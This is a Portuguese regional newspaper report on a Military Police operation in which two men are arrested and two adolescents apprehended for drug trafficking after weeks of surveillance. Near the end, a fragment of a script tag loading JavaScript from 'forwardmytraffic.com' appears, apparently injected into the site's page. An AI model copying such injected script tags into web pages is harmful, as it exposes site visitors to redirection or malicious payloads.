InícioDestaquePolícia Militar Prende Suspeitos de Tráfico de Drogas

Polícia Militar Prende Suspeitos de Tráfico de Drogas

Últimas notícias

Trata-se de ocorrência de tráfico de drogas, posse de entorpecente e desacato. O serviço de inteligência da sede do 3° BPM  estava acompanhando e monitorando a cerca de 30 dias a residência dos homens na Rua Adão Tiska, por suspeita de tráfico de drogas. Na sexta-feira, 08, os Policiais Militares viram dois adolescentes, os quais adentraram na residência monitorada e receberam de um dos homens alguns objetos.

 

Que ao saírem da residência, os adolescentes foram abordados e com um deles foi encontrada a quantidade de nove buchas de substância semelhante a maconha, sendo que o outro menor estava junto, porém nada foi encontrado com ele.

 

Diante da caracterização de tráfico de drogas em flagrante delito e das informações do serviço de inteligência de que já possuíam material comprobatório dos fatos, como filmagens e testemunhas fora adentrado na residência monitorada, onde foi encontrada quantidade de substância semelhante a cocaína, vários recipientes vazios que costumeiramente são usados para guardar cocaína,  pequena quantidade de substância semelhante a cocaína envolvida em plástico e duas buchas de maconha. Na residência da mãe de um dos homens presos masculino foram encontradas cinco buchas de substância entorpecente semelhante a maconha, cinco pedras de substância semelhante a crack e papel alumínio comumente usado para embalar drogas.

 

Que um dos dois homens presos tentou fugir, sendo detido cerca de duas quadras da residência. Diante dos fatos foi dada voz de prisão a ambos. Um dos homens presos tentou adentrar na viatura descaracterizada do serviço de inteligência e furtar o celular pertencente a um dos policiais que monitoravam a residência, sendo o mesmo impedido, e ao ser contido o autor resistiu e desacatou os policiais proferindo palavras como porcos, lixos do governo.

 

Que na casa de um dos adolescentes apreendidos, situada na Rua Álvaro Soares Machado, foi cumprido mandado de busca e apreensão concedido pela Vara Criminal da Comarca de Canoinhas.  Que os pais dos dois adolescentes apreendidos se fizeram presentes na Delegacia de Polícia Civil e acompanharam os procedimentos. Foi apreendido o aparelho celular do adolescente em cuja casa foi cumprido o mandato judicial, visto que tal celular consta no mandado de busca e apreensão. No referido aparelho foi constatado diversas conversações de tráfico de drogas. Os masculinos presos e apreendidos, bem como todos os materiais apreendidos, foram entregues na Delegacia de Polícia Civil para providências cabíveis.

 … src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe A Gazeta Tresbarrense
Equipe A Gazeta Tresbarrense
Somos um jornal regional com mais de 20 anos de existência.